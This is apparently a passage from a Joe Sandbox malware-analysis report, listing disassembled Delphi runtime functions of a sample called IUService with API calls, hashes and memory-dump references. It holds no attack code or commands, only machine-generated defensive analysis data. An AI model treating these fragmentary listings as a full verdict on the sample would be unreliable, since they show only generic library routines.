                                                                                                                                            • API ID: System@$System@@UnicodeVariant$CustomFromVariants@$Char$qqrr20Clear$qqrr8Copy$qqrx20DataFindInitStr$qqrr17StringStringiiStringpbStringx20TypeType$qqrxusrp27Variants@@Wide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 865651308-0
                                                                                                                                            • Opcode ID: 8763aa30a9ec946c4e0ccce781f236a018d130b964ecc377f3df87a6c44489d8
                                                                                                                                            • Instruction ID: 07e9fd6144ba846feccbf1d2d5f50ea28c486a3094c34e7fb266922d472c4f6f
                                                                                                                                            • Opcode Fuzzy Hash: 8763aa30a9ec946c4e0ccce781f236a018d130b964ecc377f3df87a6c44489d8
                                                                                                                                            • Instruction Fuzzy Hash: 2421C530A046889FDF06CFA4D851AEEB7F9EF89301F5186B6E804E3651D735AE04CA60
                                                                                                                                            Function 5002C9C8 Relevance: 10.6, APIs: 7, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA02
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002C9FD
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?), ref: 5002CA27
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?), ref: 5002CA2C
                                                                                                                                            • @Sysutils@TStringBuilder@set_Length$qqri.RTL120 ref: 5002CA38
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA59
                                                                                                                                            • @System@Move$qqrpxvpvi.RTL120 ref: 5002CA71
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$StringSystem@@$Sysutils@$RaiseRecxiUnicode$Except$qqrvException@$bctr$qqrp20Move$qqrpxvpviRecpx14$Asg$qqrr20Builder@set_ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqriList$qqrvLoadMetaString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 443726296-0
                                                                                                                                            • Opcode ID: fc14187b7c7c042736da71d428de2dbcd4819c84bd0ff01dd216d439d3ad4659
                                                                                                                                            • Instruction ID: 6731962c89c81303a3c1bfd03d19d81f0425a5c77e81de43e71a57f9a9c288b4
                                                                                                                                            • Opcode Fuzzy Hash: fc14187b7c7c042736da71d428de2dbcd4819c84bd0ff01dd216d439d3ad4659
                                                                                                                                            • Instruction Fuzzy Hash: 72218330B0118A9FD710DFA8EDC1E9DB7B9AF54318F5482AAE904CB356DA31ED058BD0
                                                                                                                                            Function 5001A684 Relevance: 10.6, APIs: 7, Instructions: 66COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A736), ref: 5001A6C0
                                                                                                                                              • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6DF
                                                                                                                                            • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A6F5
                                                                                                                                            • @System@@EnsureUnicodeString$qqrr20System@UnicodeString.RTL120(00000000,5001A736), ref: 5001A700
                                                                                                                                            • @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,5001A736), ref: 5001A71B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Unicode$System@$System@@$String$AnsiEnsureFromStr$qqrr20String$qqrr20Stringx27System@%T$us$i0$%$Asg$qqrr20Copy$qqrx20InternalStringiiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1585887659-0
                                                                                                                                            • Opcode ID: 0af96fd3c9c2fbfef1c1b0d62c2197b1e7fe4d8968c3db8f64cb212c1ac6a178
                                                                                                                                            • Instruction ID: d5e3eb8225a1e12af050891a21ba8373cf4462a52880f1e6278f7a9667c98c84
                                                                                                                                            • Opcode Fuzzy Hash: 0af96fd3c9c2fbfef1c1b0d62c2197b1e7fe4d8968c3db8f64cb212c1ac6a178
                                                                                                                                            • Instruction Fuzzy Hash: DC11D630A00398DFDB14DFA8DD9299DB3F8EF45200B958277E540D3166D7709F80D681
                                                                                                                                            Function 50033594 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,50033649,?,?), ref: 500335B8
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?), ref: 500335EF
                                                                                                                                            • @Sysutils@TryStrToFloat$qqrx20System@UnicodeStringrg.RTL120(?,?), ref: 500335FA
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?), ref: 50033626
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50033650), ref: 50033643
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@UnicodeWide$Check$qqrlususClr$qqrpvDataFloat$qqrx20FromResultStr$qqrr17Str$qqrr20StringStringrgStringrx8Stringx17Sysutils@Variants@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2425264070-0
                                                                                                                                            • Opcode ID: d0fa5036fc46576f6383ae867cde1e419acac45d402dfae03ef85a4ff02cf02b
                                                                                                                                            • Instruction ID: 928a28f8434e6016404c956fd81d6baeb5216577c2a257f56b979c695c6ec74d
                                                                                                                                            • Opcode Fuzzy Hash: d0fa5036fc46576f6383ae867cde1e419acac45d402dfae03ef85a4ff02cf02b
                                                                                                                                            • Instruction Fuzzy Hash: 1711E130904588AFDB22DFA8D9929DEB3F9EF48200F6086B6F204E3255EB305E04C660
                                                                                                                                            Function 50033038 Relevance: 10.6, APIs: 7, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,500330EA,?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000), ref: 50033057
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 50033099
                                                                                                                                            • @Sysutils@TryStrToBool$qqrx20System@UnicodeStringro.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 500330A4
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 500330B9
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?,00000000,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000), ref: 500330C7
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(500330F1,00000000,00000000,?,500333B2,?,?,50031DED,?,?,00000000,00000000,00000000,?,50032154,00000000), ref: 500330E4
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Check$qqrlususResultSystem@@UnicodeVariants@Wide$Bool$qqrx20Clr$qqrpvDataFromStr$qqrr17Str$qqrr20StringStringroStringrx8Stringx17Sysutils@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1173768992-0
                                                                                                                                            • Opcode ID: 7b914f00c9d1e401b406d1a73b76230443df93573383ae0a0ee94260c994b2a9
                                                                                                                                            • Instruction ID: a8a60db5bc0cf9a1b353983a5c4ec67a200eb5b5549c599d3b08386a8bf96e57
                                                                                                                                            • Opcode Fuzzy Hash: 7b914f00c9d1e401b406d1a73b76230443df93573383ae0a0ee94260c994b2a9
                                                                                                                                            • Instruction Fuzzy Hash: D611C830600188AFDB16DBA8DCA2BDD73F9EB49700F608772F600E7255D775AE09C651
                                                                                                                                            Function 5002D4FC Relevance: 10.6, APIs: 7, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D532
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D52D
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D555
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D55A
                                                                                                                                            • @System@@DynArrayLength$qqrv.RTL120(?,?), ref: 5002D562
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000000,?,?,?), ref: 5002D587
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,?,?,?), ref: 5002D58C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@$String$RaiseRecxiSysutils@$Except$qqrvException@$bctr$qqrp20Recpx14Unicode$ArrayAsg$qqrr20ClassClassoCreate$qqrp17Error$qqrucFormat$qqrx20Length$qqrvList$qqrvLoadMetaString$qqrp20Stringpx14Stringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3522162408-0
                                                                                                                                            • Opcode ID: 9cf405c63ed00766f81164b75ac821440813d4a1dc3845d93976b10434bf8ae2
                                                                                                                                            • Instruction ID: 47428fe981a4d071b565a4daeec592a8c0e379a3984f211a2d94abaeb810db43
                                                                                                                                            • Opcode Fuzzy Hash: 9cf405c63ed00766f81164b75ac821440813d4a1dc3845d93976b10434bf8ae2
                                                                                                                                            • Instruction Fuzzy Hash: 0811A231E05699ABDB10DFD8F8C1B9DB7B8AB14308F4081AAE90497252DA719E00CBA0
                                                                                                                                            Function 5002A558 Relevance: 10.6, APIs: 7, Instructions: 60windowCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@SafeLoadLibrary$qqrx20System@UnicodeStringui.RTL120(00000000,5002A618), ref: 5002A57F
                                                                                                                                              • Part of subcall function 5002B630: SetErrorMode.KERNEL32(00008000), ref: 5002B63A
                                                                                                                                              • Part of subcall function 5002B630: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B663
                                                                                                                                              • Part of subcall function 5002B630: LoadLibraryW.KERNEL32(00000000,00000000,5002B684,?,00000000,5002B6A2,?,00008000), ref: 5002B669
                                                                                                                                            • GetLastError.KERNEL32(00000000,5002A618), ref: 5002A594
                                                                                                                                            • @Sysutils@SysErrorMessage$qqrui.RTL120(00000000,5002A618), ref: 5002A59C
                                                                                                                                              • Part of subcall function 50025B28: FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B47
                                                                                                                                              • Part of subcall function 50025B28: @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,5002A945,00000000,5002A99F,?,00000000), ref: 50025B69
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRecpx14System@TVarRecxi.RTL120(00000001,?,00000000,5002A618), ref: 5002A5BE
                                                                                                                                              • Part of subcall function 500267B0: @System@@ClassCreate$qqrp17System@TMetaClasso.RTL120 ref: 500267C1
                                                                                                                                              • Part of subcall function 500267B0: @System@LoadResString$qqrp20System@TResStringRec.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267E3
                                                                                                                                              • Part of subcall function 500267B0: @Sysutils@Format$qqrx20System@UnicodeStringpx14System@TVarRecxi.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267F1
                                                                                                                                              • Part of subcall function 500267B0: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,00000000,5002681C,?,?,500A6B50,00000000,00000000,00000000,?,5002A967,00000001,?,00000000,5002A99F,?), ref: 500267FC
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000001,?,00000000,5002A618), ref: 5002A5C3
                                                                                                                                              • Part of subcall function 50007D94: @System@@RunError$qqruc.RTL120 ref: 50007D9D
                                                                                                                                              • Part of subcall function 50007D94: @System@RaiseList$qqrv.RTL120(?,?,?,00000007,?,?,?,?,?,?,?,?,0EEDFADE,00000001,00000007), ref: 50007DDB
                                                                                                                                            • @Sysutils@InitializePackage$qqruipqqrui$o.RTL120(00000000,5002A5EA,?,00000000,5002A618), ref: 5002A5DB
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$System@@Unicode$Sysutils@$String$ErrorLoad$RaiseRecxi$Asg$qqrr20CharChar$qqrx20ClassClassoCreate$qqrp17Error$qqrucExcept$qqrvException@$bctr$qqrp20FormatFormat$qqrx20FromInitializeLastLen$qqrr20LibraryLibrary$qqrx20List$qqrvMessageMessage$qqruiMetaModePackage$qqruipqqrui$oRecpx14SafeString$qqrp20StringpbiStringpx14StringuiStringx20
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3738557425-0
                                                                                                                                            • Opcode ID: fe5b3e8d2f5ffc72b2367006201fb38f46a8a440544c7033cdf5550ca43c16ae
                                                                                                                                            • Instruction ID: d7048bc2172d421995a8c02b2ad295fbd71a2bff1422e86dc26ccdf7dab828b2
                                                                                                                                            • Opcode Fuzzy Hash: fe5b3e8d2f5ffc72b2367006201fb38f46a8a440544c7033cdf5550ca43c16ae
                                                                                                                                            • Instruction Fuzzy Hash: 801108309066999FE705CFA4FC529AEBBF8EB59310F504576F504E3241DB745E00C7A0
                                                                                                                                            Function 50034350 Relevance: 10.6, APIs: 7, Instructions: 58COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Variants@@VarToWStr$qqrr17System@WideStringrx8TVarData.RTL120(00000000,500343FC,?,?), ref: 50034374
                                                                                                                                            • @System@@UStrFromWStr$qqrr20System@UnicodeStringx17System@WideString.RTL120(?,?), ref: 500343AB
                                                                                                                                            • @Sysutils@TryStrToCurr$qqrx20System@UnicodeStringr15System@Currency.RTL120(?,?), ref: 500343B6
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?), ref: 500343CB
                                                                                                                                            • @Variants@VarResultCheck$qqrlusus.RTL120(?,?), ref: 500343D9
                                                                                                                                            • @System@@WStrClr$qqrpv.RTL120(50034403), ref: 500343F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_34_2_50000000_IUService.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: System@$Check$qqrlususResultSystem@@UnicodeVariants@Wide$Clr$qqrpvCurr$qqrx20CurrencyDataFromStr$qqrr17Str$qqrr20StringStringr15Stringrx8Stringx17Sysutils@Variants@@
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3793089262-0
                                                                                                                                            • Opcode ID: c8516776b8bcdd41f6200822a2d131a50b3ddce558ea84b78d477e80b00441dd
                                                                                                                                            • Instruction ID: c011e0f582ae6ef03b1f2e1be8a8da17cf36d8c3296fe0757dde987aac1089ac
                                                                                                                                            • Opcode Fuzzy Hash: c8516776b8bcdd41f6200822a2d131a50b3ddce558ea84b78d477e80b00441dd
                                                                                                                                            • Instruction Fuzzy Hash: 7211B2309015999FDB42DBA4DD529DFB7E9EB85200F608232B604E7255EB306F05C691
                                                                                                                                            Function 5001046C Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • @Sysutils@Exception@$bctr$qqrp20System@TResStringRec.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104AC
                                                                                                                                            • @System@@RaiseExcept$qqrv.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104B1
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104C2
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 500104DF
                                                                                                                                            • @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(?,00000000,50010520,?,?,?,00000000,00000000), ref: 500104F5
                                                                                                                                            • @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(00000000,50010520,?,?,?,00000000,00000000), ref: 50010500
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 50000000, based on PE: true
                                                                                                                                            • Associated: 00000022.00000002.2346348283.0000000050000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347614191.000000005009C000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347666251.000000005009D000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347844466.00000000500AA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347882113.00000000500AB000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.00000000500FD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            • Associated: 00000022.00000002.2347930538.0000000050113000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
